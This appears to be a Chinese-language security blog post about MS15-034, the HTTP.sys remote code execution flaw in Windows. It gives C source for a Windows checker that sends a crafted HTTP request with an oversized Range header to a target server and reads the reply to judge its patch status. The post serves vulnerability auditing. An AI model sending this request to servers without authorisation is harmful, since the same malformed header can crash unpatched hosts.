漏洞信息:
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。这里将测试工具改成windows版本方便工作。
代码:
/* UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here */ #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <winsock2.h> #include <Ws2tcpip.h> #pragma comment(lib,"ws2_32.lib") int connect_to_server(char *ip,const int port) { int sockfd = 0, n = 0; //SOCKET sockSrv; struct sockaddr_in serv_addr; //初始化版本 WORD version(0); WSADATA wsadata; int socket_return(0); version = MAKEWORD(2,0); socket_return = WSAStartup(version,&wsadata); if (socket_return != 0) { return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf(" Error : Could not create socket %d ",GetLastError()); return 1; } memset(&serv_addr, '0', sizeof(serv_addr)); serv_addr.sin_family = AF_INET; //serv_addr.sin_port = htons(80); serv_addr.sin_port = htons(port); if (inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0) { printf(" inet_pton error occured "); return 1; } if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { printf(" Error : Connect Failed "); exit(-1); return 1; } return sockfd; } int main(int argc, char *argv[]) { int n = 0; int sockfd; char recvBuff[1024]; // Check server char request[] = "GET / HTTP/1.0 "; // our evil buffer char request1[] = "GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615 "; if (argc != 3) { printf(" Usage: %s <ip of server> <port of server> ",argv[0]); return 1; } printf("[*] Audit Started "); sockfd = connect_to_server(argv[1],atoi(argv[2])); send(sockfd, request, strlen(request),0); recv(sockfd, recvBuff, sizeof(recvBuff)-1,0); if (!strstr(recvBuff,"Microsoft")) { printf("[*] NOT IIS "); exit(1); } sockfd = connect_to_server(argv[1],atoi(argv[2])); send(sockfd, request1, strlen(request1),0); recv(sockfd, recvBuff, sizeof(recvBuff)-1,0); if (strstr(recvBuff,"Requested Range Not Satisfiable")) { printf("[!!] Looks VULN "); exit(1); } else if (strstr(recvBuff,"The request has an invalid header name")) { printf("[*] Looks Patched"); } else { printf("[*] Unexpected response, cannot discern patch status"); } return 0; }
测试截图:
